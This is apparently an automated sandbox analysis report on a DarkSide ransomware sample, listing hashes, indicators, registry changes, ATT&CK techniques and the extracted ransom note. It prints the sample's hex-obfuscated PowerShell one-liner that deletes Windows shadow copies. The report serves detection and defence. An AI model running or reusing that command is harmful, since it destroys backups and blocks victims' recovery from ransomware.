darkside | 89eeac2abad61ef22fd914f9c4efaba04ca830d93ab1611c985531ac6d5e8460

Analysis

max time kernel
109s
max time network
113s
platform
windows7_x64
resource
win7v20210410
submitted
12-05-2021 19:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Size

59KB
MD5

0e178c4808213ce50c2540468ce409d3
SHA1

38b5aa765026dffbb603e323333294b5f5efa5ee
SHA256

533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d
SHA512

262a8f4808f6c3499c9eb465b480508ed6b082ddd36cf2e618a9455b5abbc2eb6a8d7b7c2f398faaa62ffb22599a8b2eec0d3137fdec648de37ac4a73e6f44f4

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/VGBU8VAXXW7EYB5U4KQJXUGU5NT5FP8208W6UXVSKQDAE3CNBR4JTZQCXEZFZWF2 When you open our website, put the following data in the input form: Key: sWzBJoqqzL4Zn2RW3HUX03kMJd3SWd7m4wOpd3qUa7eex62poH0PPw7q8ONVepO7dEN6e5RAd7rcv5gHKhPV1uhNsHoV924TIKvNciRU1S0rZhklOZB2E3fcb6WquR9dJAbdA7WTO3bEaNproivkWdrzaYiIpn006YgPHpQbAPGJP7hiVtD8SBKSoie2u3ErPSC51J4jVLOqDj1nqdGnZjZGHyKE092eobTQ1AVRz6xa93AFD6YzLs8D5M1ixHXr6p3ft5xplmULrkaOCnSLMPolSLDUYYoSK37JhGkr4yPVRxwFTCuG8jUe83t2q19AZM9lcqC4Vly1Yyhhu4EHwk2S3AEJp27xrv0Ba4qlNY1P8tFdoh8yG4HSPX7qBMJ3Twk2NSSBzx4wV07gFVw4jSn1E5GF4y0OSz71wszVEolQWnM6MMCwoBPBCFEnSN4ehk1AKlR8QqjLXR9Qn2t0BHt3iUssq3uAq5JY4O8M9ZHw2bXlULA9hzxIlOYJtw5zuMqi8rvzMRmx5IRGKKorl4MPDpEyOr2fg5rMjn4axW6IKvxN3XecwB4 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidfqzcuhtk2.onion/VGBU8VAXXW7EYB5U4KQJXUGU5NT5FP8208W6UXVSKQDAE3CNBR4JTZQCXEZFZWF2

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\ConvertToClear.crw => C:\Users\Admin\Pictures\ConvertToClear.crw.341d6443	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertToClear.crw.341d6443	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP"	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP"	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10"	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

Modifies registry class 5 IoCs

Processes:

533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443"	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico"	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

pid	process
1932	powershell.exe
1932	powershell.exe
788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeSecurityPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeTakeOwnershipPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeLoadDriverPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeSystemProfilePrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeSystemtimePrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeProfSingleProcessPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeIncBasePriorityPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeCreatePagefilePrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeBackupPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeRestorePrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeShutdownPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeDebugPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeSystemEnvironmentPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeRemoteShutdownPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeUndockPrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeManageVolumePrivilege	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: 33	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: 34	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: 35	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeBackupPrivilege	1504	vssvc.exe
Token: SeRestorePrivilege	1504	vssvc.exe
Token: SeAuditPrivilege	1504	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

description	pid	process	target process
PID 788 wrote to memory of 1932	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe	powershell.exe
PID 788 wrote to memory of 1932	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe	powershell.exe
PID 788 wrote to memory of 1932	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe	powershell.exe
PID 788 wrote to memory of 1932	788	533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
"C:\Users\Admin\AppData\Local\Temp\533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1932

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
4737054030778557c5f4a98a5e42b2a7

SHA1
4a2d33cb29e62176682efe75656ca04c028d426f

SHA256
156f18104fb37a4bdced5886f8a39469ec8f602f72f312f79949cc30fdf58e75

SHA512
e9779191788d44096d3ad47cd0dedccb4e91b2bd225fd136a15793547d8bda11aaa0acb06a41a30529c9d3f80c2381d5584d38e999d5fdf8f866a951488da398

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
bad3e2a5b50f7a2da84a5c4426522722

SHA1
e746d4a3ba1970663f1412f2fb45c06a3a921f44

SHA256
2f3e961dd9acc9754cd2017bc45cde3922e06d223075690cd155efb27177cc74

SHA512
26ba3afb1bd5e6e2a631f40f5c8746a897f6e765b22855e928dc685df0f3f046f861591126ba845b3d3c0296d55363ca5716134bfdb8f5d1ebd851b42f13c29e

Download Submit
memory/788-60-0x00000000757E1000-0x00000000757E3000-memory.dmp

Filesize
8KB

Download
memory/1932-66-0x000000001AAC4000-0x000000001AAC6000-memory.dmp

Filesize
8KB

Download
memory/1932-64-0x000000001AB40000-0x000000001AB41000-memory.dmp

Filesize
4KB

Download
memory/1932-65-0x000000001AAC0000-0x000000001AAC2000-memory.dmp

Filesize
8KB

Download
memory/1932-63-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/1932-67-0x0000000002630000-0x0000000002631000-memory.dmp

Filesize
4KB

Download
memory/1932-68-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/1932-69-0x000000001B4B0000-0x000000001B4B1000-memory.dmp

Filesize
4KB

Download
memory/1932-70-0x000000001C510000-0x000000001C511000-memory.dmp

Filesize
4KB

Download
memory/1932-62-0x000007FEFB8F1000-0x000007FEFB8F3000-memory.dmp

Filesize
8KB

Download
memory/1932-61-0x0000000000000000-mapping.dmp

Download